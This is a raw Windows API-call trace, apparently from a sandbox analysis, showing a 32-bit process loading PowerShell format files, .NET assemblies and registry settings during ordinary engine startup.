	[0159.195] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce2990*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.195] GetLastError () returned 0x0
	[0159.195] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce2990*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.195] GetLastError () returned 0x0
	[0159.196] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce2990*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.196] GetLastError () returned 0x0
	[0159.196] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce2990*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.196] GetLastError () returned 0x0
	[0159.197] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce2990*, lpNumberOfBytesRead=0x10e614*=0xfb2, lpOverlapped=0x0) returned 1
	[0159.197] GetLastError () returned 0x0
	[0159.197] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce20e2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e2*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0159.197] GetLastError () returned 0x0
	[0159.198] ReadFile (in: hFile=0x31c, lpBuffer=0x2ce2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce2990*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0159.198] GetLastError () returned 0x0
	[0159.198] CloseHandle (hObject=0x31c) returned 1
	[0159.198] GetLastError () returned 0x0
	[0159.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.198] GetLastError () returned 0x0
	[0159.198] SetErrorMode (uMode=0x1) returned 0x1
	[0159.198] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d03220 | out: lpFileInformation=0x2d03220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0159.198] GetLastError () returned 0x0
	[0159.198] SetErrorMode (uMode=0x1) returned 0x1
	[0159.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.198] GetLastError () returned 0x0
	[0159.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x31c) returned 0x0
	[0159.199] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0159.199] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0159.199] RegCloseKey (hKey=0x31c) returned 0x0
	[0159.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.199] GetLastError () returned 0x0
	[0159.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.199] GetLastError () returned 0x0
	[0159.201] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1d9fde17, Data2=0x7616, Data3=0x4abd, Data4=([0]=0x95, [1]=0x5d, [2]=0x94, [3]=0x1b, [4]=0x66, [5]=0xe0, [6]=0x37, [7]=0xec))) returned 0x0
	[0159.214] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x59381de2, Data2=0xff94, Data3=0x464c, Data4=([0]=0xaf, [1]=0x7, [2]=0x6b, [3]=0x21, [4]=0x7e, [5]=0x4c, [6]=0xba, [7]=0xc4))) returned 0x0
	[0159.218] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x8adfe4b9, Data2=0xccf6, Data3=0x4b22, Data4=([0]=0xa1, [1]=0x45, [2]=0xe3, [3]=0x16, [4]=0xb4, [5]=0x57, [6]=0xf3, [7]=0xa2))) returned 0x0
	[0159.218] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x92528735, Data2=0x67b4, Data3=0x4305, Data4=([0]=0x95, [1]=0x2a, [2]=0x72, [3]=0x65, [4]=0x31, [5]=0xf7, [6]=0xdc, [7]=0x2))) returned 0x0
	[0159.218] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xb9a86016, Data2=0xfc17, Data3=0x4db4, Data4=([0]=0xa5, [1]=0x8b, [2]=0xa7, [3]=0x1c, [4]=0xcc, [5]=0xc4, [6]=0x36, [7]=0xe5))) returned 0x0
	[0159.218] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x7d674786, Data2=0x85a8, Data3=0x488c, Data4=([0]=0x9a, [1]=0x1a, [2]=0x90, [3]=0x38, [4]=0xaa, [5]=0xe5, [6]=0x82, [7]=0x5))) returned 0x0
	[0159.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.219] GetLastError () returned 0x0
	[0159.219] SetErrorMode (uMode=0x1) returned 0x1
	[0159.219] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0159.219] GetLastError () returned 0x0
	[0159.219] GetFileType (hFile=0x31c) returned 0x1
	[0159.220] SetErrorMode (uMode=0x1) returned 0x1
	[0159.220] GetFileType (hFile=0x31c) returned 0x1
	[0159.220] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.510] GetLastError () returned 0x0
	[0159.510] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.536] GetLastError () returned 0x0
	[0159.537] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.550] GetLastError () returned 0x0
	[0159.550] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.550] GetLastError () returned 0x0
	[0159.551] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.552] GetLastError () returned 0x0
	[0159.552] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0159.552] GetLastError () returned 0x0
	[0159.552] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0xaca, lpOverlapped=0x0) returned 1
	[0159.552] GetLastError () returned 0x0
	[0159.552] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22232, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22232*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0159.552] GetLastError () returned 0x0
	[0159.552] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d22bc8*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0159.552] GetLastError () returned 0x0
	[0159.552] CloseHandle (hObject=0x31c) returned 1
	[0159.552] GetLastError () returned 0x0
	[0159.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.552] GetLastError () returned 0x0
	[0159.553] SetErrorMode (uMode=0x1) returned 0x1
	[0159.553] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d43bc4 | out: lpFileInformation=0x2d43bc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0159.553] GetLastError () returned 0x0
	[0159.553] SetErrorMode (uMode=0x1) returned 0x1
	[0159.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.553] GetLastError () returned 0x0
	[0159.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x31c) returned 0x0
	[0159.553] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0159.553] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0159.554] RegCloseKey (hKey=0x31c) returned 0x0
	[0159.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.554] GetLastError () returned 0x0
	[0159.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.554] GetLastError () returned 0x0
	[0159.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0159.580] GetLastError () returned 0x0
	[0159.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0159.582] GetLastError () returned 0x57
	[0159.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0159.722] GetLastError () returned 0x57
	[0159.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0159.730] GetLastError () returned 0x57
	[0159.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0159.735] GetLastError () returned 0x57
	[0159.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0159.746] GetLastError () returned 0x57
	[0159.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0159.847] GetLastError () returned 0x57
	[0159.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0159.851] GetLastError () returned 0x57
	[0159.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0159.853] GetLastError () returned 0x57
	[0160.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0160.143] GetLastError () returned 0x57
	[0160.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0160.152] GetLastError () returned 0x57
	[0160.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0160.164] GetLastError () returned 0x57
	[0160.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0160.288] GetLastError () returned 0x57
	[0160.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0160.299] GetLastError () returned 0x57
	[0160.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0160.330] GetLastError () returned 0x57
	[0160.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0160.331] GetLastError () returned 0x57
	[0160.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0160.332] GetLastError () returned 0x57
	[0160.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0160.332] GetLastError () returned 0x57
	[0160.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.332] GetLastError () returned 0x57
	[0160.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.332] GetLastError () returned 0x57
	[0160.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.332] GetLastError () returned 0x57
	[0160.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.333] GetLastError () returned 0x57
	[0160.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.333] GetLastError () returned 0x57
	[0160.673] VirtualQuery (in: lpAddress=0x10d2f0, lpBuffer=0x10e2f0, dwLength=0x1c | out: lpBuffer=0x10e2f0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.697] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xe578f111, Data2=0x2b99, Data3=0x46f3, Data4=([0]=0x89, [1]=0x42, [2]=0xcd, [3]=0x10, [4]=0x65, [5]=0x45, [6]=0x33, [7]=0xfc))) returned 0x0
	[0160.697] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x8a8791d6, Data2=0x706d, Data3=0x40d4, Data4=([0]=0xbc, [1]=0x3f, [2]=0x92, [3]=0x89, [4]=0x76, [5]=0x1a, [6]=0xe0, [7]=0xc6))) returned 0x0
	[0160.698] VirtualQuery (in: lpAddress=0x10d368, lpBuffer=0x10e368, dwLength=0x1c | out: lpBuffer=0x10e368*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.698] VirtualQuery (in: lpAddress=0x10d368, lpBuffer=0x10e368, dwLength=0x1c | out: lpBuffer=0x10e368*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.698] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xfafcd352, Data2=0xe5ba, Data3=0x45e5, Data4=([0]=0x9c, [1]=0xe9, [2]=0x58, [3]=0x5f, [4]=0x1f, [5]=0x41, [6]=0x2a, [7]=0x6c))) returned 0x0
	[0160.699] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x73fdfe2e, Data2=0x89f, Data3=0x4e3a, Data4=([0]=0xa6, [1]=0xb0, [2]=0xca, [3]=0x21, [4]=0x14, [5]=0xc8, [6]=0xa, [7]=0x44))) returned 0x0
	[0160.699] VirtualQuery (in: lpAddress=0x10d494, lpBuffer=0x10e494, dwLength=0x1c | out: lpBuffer=0x10e494*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.699] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.699] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
